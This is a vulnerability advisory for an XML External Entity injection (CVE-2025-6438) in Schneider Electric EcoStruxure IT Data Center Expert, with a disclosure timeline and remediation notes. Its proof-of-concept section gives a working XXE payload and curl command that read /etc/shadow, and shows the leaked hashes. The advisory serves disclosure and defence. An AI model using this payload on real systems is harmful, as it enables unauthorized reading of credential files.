-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection

Title: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection
Advisory ID: KL-001-2025-006
Publication Date: 2025-07-09
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-006.txt


1. Vulnerability Details

     Affected Vendor: Schneider Electric
     Affected Product: EcoStruxure IT Data Center Expert
     Affected Version: 8.3 and prior
     Platform: CentOS
     CWE Classification: CWE-611: Improper Restriction of XML
                         External Entity Reference
     CVE ID: CVE-2025-6438


2. Vulnerability Description

     The "DataExchange" route allows the XML body of
     SOAP requests to contain references to external entities.
     This allows an unauthenticated attacker to read local
     files, perform server-side request forgery, and overwhelm
     the web server resources.


3. Technical Description

     From an authenticated perspective a user can send SOAP requests
     to the "/DataExchange/DataExchangeService" web route, providing
     an XML document in the POST body. When the web application
     processes the XML it will insecurely resolve entities that
     reference external resources, such as local files.

     The "GetHistoryRequest" SOAP action can be utilized to
     exfiltrate the resolved value by placing the entity reference
     within the XML document's "Id" parameter. The resulting error
     message reflects the value of the resolved entity, such as
     contents of a local file.


4. Mitigation and Remediation Recommendation

     Version 9.0 of EcoStruxure IT Data Center Expert includes
     fixes for these vulnerabilities and is available upon request
     from Schneider Electric's Customer Care Center. Refer to
     https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.


5. Credit

     This vulnerability was discovered by Jaggar Henry and Jim
     Becher of KoreLogic, Inc.


6. Disclosure Timeline

     2024-11-21 : KoreLogic reports vulnerability details to
                  Schneider Electric CPCERT.
     2024-11-22 : Vendor acknowledges receipt of KoreLogic's
                  submission.
     2024-12-06 : Vendor confirms the reported vulnerability.
     2024-12-12 : Vendor requests a meeting with KoreLogic to discuss
                  the timeline of remediation efforts for this
                  vulnerability, as well as for associated submissions
                  from KoreLogic.
     2024-12-18 : KoreLogic and Schneider Electric agree to embargo
                  vulnerability details until product update 9.0,
                  circa July, 2025.
     2025-01-29 : Vendor provides status update.
     2025-03-17 : Vendor provides beta release containing remediation
                  for this and other associated vulnerabilities
                  reported by KoreLogic.
     2025-06-20 : Vendor notifies KoreLogic that the publication date
                  for this vulnerability will be 2025-07-08.
     2025-07-08 : Vendor public disclosure.
     2025-07-09 : KoreLogic public disclosure.


7. Proof of Concept

    [attacker@box]$ cat payload
    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/shadow'>]>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.schneider-electric.com/common/dataexchange/2011/05">
       <soapenv:Header/>
       <soapenv:Body>
          <ns:GetHistoryRequest>
             <ns:GetHistoryParameter>
                <ns:Id>&test;</ns:Id>
             </ns:GetHistoryParameter>
             <ns:GetHistoryFilter>
             </ns:GetHistoryFilter>
          </ns:GetHistoryRequest>
       </soapenv:Body>
    </soapenv:Envelope>

    [attacker@box]$ curl --digest --user kore:logic                                  \
                         -k https://dce.example.com/DataExchange/DataExchangeService \
                         -H 'Content-Type: text/xml' --data @payload

    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:Body><soap:Fault><faultcode>soap:Client</faultcode><faultstring>Invalid Id</faultstring><detail><Fault_Invalid_Id xmlns="http://www.schneider-electric.com/common/dataexchange/2011/05/DataExchangeInterface/Fault">root:$6$nAQ9/nHfzNJH2Q28$t0.KyJ810alBDwz3NGyEWNGWzQgXdrsUooT1UbXKz9SfpkHLaZngVY6oA8TVCYnCqP2boorvDsmufXawpy1T41:20021:0:99999:7:::
    bin:*:19767:0:99999:7:::
    daemon:*:19767:0:99999:7:::
    adm:*:19767:0:99999:7:::
    lp:*:19767:0:99999:7:::
    mail:*:19767:0:99999:7:::
    ...


The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmhurSAaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkelvSQ//U+2sYjMmDGvKhGC1Xp8q
L4sKuY66gudn3KGp86cHmvSOi9O0MRHeNnRF8kAZT2avx4Q3sR89h8OXz5NmegRW
crHMq+uXs2BltJih5HJoF0jsmhGTFH5h2nmn/xbXwYk0oUY+6Ip8CfFc39C5pkzH
P9pd5I3TJvi71sLegz1KgUdsaIw3uYWePUSH6lvEl6KbG7bRvTJAyysa9tFcYx85
pMF1Ae7LS1ySJid3RwI4/iwBMnHb5uhXr8rRuKAnUbBn0GzeinzuiRCxew7AjqFs
uuXUA9hf9nUoPfI5QI6Q3cjBbm040PvH8uW76QyNnumOXpaUl+8cZMGOcW6tijpk
0btfYpuSLM5qNLfEnxte1gZqV7bOHDgj+h3o1BKNhQVghxGvs3ae7X1avMtN/fUG
b70fg95z3P633HeHAt0RrsCSpW3Y6u2zEkQqVZ/mkyfprWwngTL/P+Gk/KmCGZ9o
gC4Q5HnxZS4aGNUEzXeK8znxb+WschtYm3H214fKaNbN+k3luUighIpPzxrsPAdZ
w5qir5lRmmCi2rV/3sOkd+yx65ZnbxgKjlKk8x9+ue/d3E6SqiDOF+Tz4hv+typs
du3GSPYwNBZuriYNJNrmhj05QQxFJA6TBDPnrlyjm9kl/HtqWlTv7jv16RZYKOV/
QoisPz/GyEo9oyp0zfjnko8=
=xL0O
-----END PGP SIGNATURE-----